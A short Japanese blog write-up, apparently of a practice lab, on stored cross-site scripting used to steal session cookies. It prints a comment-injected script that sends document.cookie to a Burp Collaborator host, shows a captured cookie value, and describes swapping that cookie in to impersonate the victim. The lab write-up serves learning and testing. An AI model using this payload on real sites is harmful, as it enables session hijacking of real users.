Shikata Ga Nai

Private? There is no such things.

Exploiting cross-site scripting to steal cookiesをやってみた

Hello there, ('ω')ノ

 

クロスサイトスクリプティングを利用してCookieを盗むを。

このラボは、ブログのコメント機能に脆弱性があって。

被害者は、すべてのコメントを表示する際に脆弱性が悪用されて。

被害者のセッションCookieを盗み出して、それを使用して被害者になりすまして。

 

コラボレータを起動して、ペイロードをコピーして。

 

f:id:ThisIsOne:20210326155027p:plain

 

下記のスクリプトを投稿して。

このスクリプトで、コメントを表示するすべての人にPOSTリクエストを発行させて。

コラボレータのリクエストは、Cookieの値が含まれて。

 

<script>
fetch('https://i9syryql3m1s4p4r5bvit4lwvn1dp2.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

 

f:id:ThisIsOne:20210326155118p:plain

 

投稿されたことを確認して。

 

f:id:ThisIsOne:20210326155212p:plain

 

HTTPインタラクションが表示されると。

リクエストにある被害者のCookieの値を取得して。

 

 tGK0ZVaLut6i9zpDu8psnyLhbLmnJ38W

 

f:id:ThisIsOne:20210326160704p:plain

 

インターセプトをオンにして、Homeへアクセスして。

 

f:id:ThisIsOne:20210326155511p:plain

 

コラボレータで取得したCookieの値と入れ替えて。

 

f:id:ThisIsOne:20210326160803p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210326160840p:plain

 

Best regards, (^^ゞ